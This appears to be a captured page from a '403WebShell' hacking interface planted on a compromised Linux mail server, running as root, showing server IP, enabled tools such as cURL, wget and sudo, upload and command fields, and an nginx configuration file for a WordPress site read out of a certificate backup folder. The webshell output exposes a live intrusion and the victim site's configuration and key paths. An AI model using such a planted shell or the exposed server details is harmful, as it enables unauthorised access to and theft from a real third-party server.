Uname:Linux mail.sarafai.ru 6.1.0-43-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.162-1 (2026-02-08) x86_64

403WebShell
403Webshell
Server IP : 82.148.16.210  /  Your IP : 216.73.216.19
Web Server : nginx/1.29.5
System : Linux mail.sarafai.ru 6.1.0-43-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.162-1 (2026-02-08) x86_64
User : root ( 0)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/letsencrypt/backups/1654604014.196386/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/letsencrypt/backups/1654604014.196386/levasheva.ru_6
upstream php_www_levasheva_ru {
    server unix:/var/run/php-fpm.www_levasheva_ru.pid;
    #server 127.0.0.1:9000;
}

server {
    if ($host = www.levasheva.ru) {
        return 301 https://$host$request_uri;
    } # managed by Certbot


    if ($host = levasheva.ru) {
        return 301 https://$host$request_uri;
    } # managed by Certbot


    listen [::]:80;
    listen 80;

    server_name levasheva.ru www.levasheva.ru;

    root /var/www/levasheva.ru/public;

    location /.well-known/acme-challenge {
        root /srv/letsencrypt;
    }
    
    location / {
		proxy_cookie_path / "/; HttpOnly; SameSite=None; Secure";
        return 301 https://levasheva.ru$request_uri;
    }

    location = /favicon.ico {
        log_not_found off;
        access_log off;
    }

    location = /robots.txt {
        allow all;
        log_not_found off;
        access_log off;
    }

    error_log /var/log/nginx/levasheva.ru_error.log;
    access_log /var/log/nginx/levasheva.ru_access.log;

    #include gzip.conf;
    #include h5bp/advanced.conf;

}


server {
    listen [::]:443 ssl http2;
    listen 443 ssl http2;

    server_name www.levasheva.ru;
    ssl_certificate /etc/letsencrypt/live/levasheva.ru/fullchain.pem; # managed by Certbot
    ssl_certificate_key /etc/letsencrypt/live/levasheva.ru/privkey.pem; # managed by Certbot
    ssl_trusted_certificate /etc/letsencrypt/live/levasheva.ru/fullchain.pem;

    include h5bp/advanced.conf;

    return 301 https://levasheva.ru$request_uri;

}


server {
    listen [::]:443 ssl http2;
    listen 443 ssl http2;

    server_name levasheva.ru;

    root /var/www/levasheva.ru/public;
    index index.php index.html;

    charset utf-8;
    # expires 86400s;
    # add_header Pragma public;
    # add_header Cache-Control "max-age=86400, public, must-revalidate, proxy-revalidate";
    ssl_certificate /etc/letsencrypt/live/levasheva.ru/fullchain.pem; # managed by Certbot
    ssl_certificate_key /etc/letsencrypt/live/levasheva.ru/privkey.pem; # managed by Certbot
    ssl_trusted_certificate /etc/letsencrypt/live/levasheva.ru/fullchain.pem;

    # Do not allow access to files giving away your WordPress version
    location ~ /(\.|wp-config.php|readme.html|licence.txt) {
        return 404;
    }

    # Add trailing slash to */wp-admin requests.
    rewrite /wp-admin$ $scheme://$host$uri/ permanent;

    location = /favicon.ico {
        log_not_found off;
        access_log off;
    }

    location = /robots.txt {
        allow all;
        log_not_found off;
        access_log off;
    }

    # Deny access to hidden files
    #location ~ /\. {
    #    deny all;
    #    access_log off;
    #    log_not_found off;
    #}

    location ~* /(?:uploads|files)/.*\.php$ {
        deny all;
    }

    location / {
        try_files $uri $uri/ /index.php?$args;

        # your usual config ...
        # hack, set all cookies to secure, httponly and samesite (strict or lax)
        # proxy_cookie_path / "/; secure; HttpOnly; SameSite=strict";
		# /; SameSite=None; Secure
		proxy_cookie_path / "/; HttpOnly; SameSite=None; Secure";
	
    }

    # get friendly url links working
    if (!-e $request_filename)
    {
        rewrite ^(.+)$ /index.php?q=$1 last;
    }

    #location ~ /.*\.php$ {
    location ~ \.php$ {
        try_files $uri =404;

        #if ( -f $request_filename ) {
        #fastcgi_pass 127.0.0.1:9000;
        #fastcgi_pass unix:/var/run/php-fpm.www_levasheva_ru.pid;
        fastcgi_pass php_www_levasheva_ru;
        #}

        #fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
        #fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_param PATH_INFO $fastcgi_script_name;

        fastcgi_index  index.php;
        fastcgi_param  SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include        /etc/nginx/fastcgi_params;
        #fastcgi_intercept_errors on;
        fastcgi_ignore_client_abort off;
        fastcgi_connect_timeout 60;
        fastcgi_send_timeout 180;
        fastcgi_read_timeout 180;
        fastcgi_buffer_size 128k;
        fastcgi_buffers 4 256k;
        fastcgi_busy_buffers_size 256k;
        fastcgi_temp_file_write_size 256k;

        client_max_body_size 1g;
        client_body_buffer_size 128k;
    }

    location ~* \.(js|css|png|jpg|jpeg|gif|ico)$ {
        expires max;
        access_log off;
        log_not_found off;
        add_header Pragma public;
        # Disabled on 2020.04.19 #add_header Cache-Control "max-age=31536000, public";
    }
	
    #location ~ /\.ht {
    #    deny all;
    #}

    error_page 403 = 404;
    error_page 404 = /404.html;
    location = /404.html {
        root /var/www/levasheva.ru/errors;
        internal;
    }
    error_page 500 = /500.html;
    location = /500.html {
        root /var/www/levasheva.ru/errors;
        internal;
    }
    error_page 502 = /502.html;
    location = /502.html {
        root /var/www/levasheva.ru/errors;
        internal;
    }
    error_page 503 = /503.html;
    location = /503.html {
        root /var/www/levasheva.ru/errors;
        internal;
    }
    error_page 504 = /504.html;
    location = /504.html {
        root /var/www/levasheva.ru/errors;
        internal;
    }

    error_log /var/log/nginx/levasheva.ru_error.log;
    access_log /var/log/nginx/levasheva.ru_access.log;

    include gzip.conf;
    include h5bp/advanced.conf;



}

Youez - 2016 - github.com/yon3zu
LinuXploit